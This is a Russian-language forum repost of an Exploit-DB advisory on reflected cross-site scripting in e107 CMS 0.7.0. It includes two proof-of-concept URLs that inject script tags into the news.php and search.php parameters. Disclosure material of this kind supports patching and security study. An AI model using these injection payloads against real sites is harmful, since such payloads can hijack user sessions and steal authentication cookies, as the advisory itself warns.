Exploit e107 CMS 0.7 - Multiple Cross-Site Scripting Vulnerabilities

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
31700
Проверка EDB
  1. Пройдено
Автор
ZORLU
Тип уязвимости
WEBAPPS
Платформа
PHP
CVE
N/A
Дата публикации
2008-04-24
Код:
source: https://www.securityfocus.com/bid/28917/info

e107 CMS is prone to multiple cross-site scripting vulnerabilities because the application fails to sanitize user-supplied input.

An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.

e107 0.7.0 is vulnerable; other versions may also be affected. 

http://localhost/a/news.php?day."><script>alert("www.z0rlu.ownspace.org")</script>
http://localhost/a/search.php?q="><script>alert("www.z0rlu.ownspace.org")</script>&r=0&s.x=8&s.y=4
 
Источник
www.exploit-db.com

Похожие темы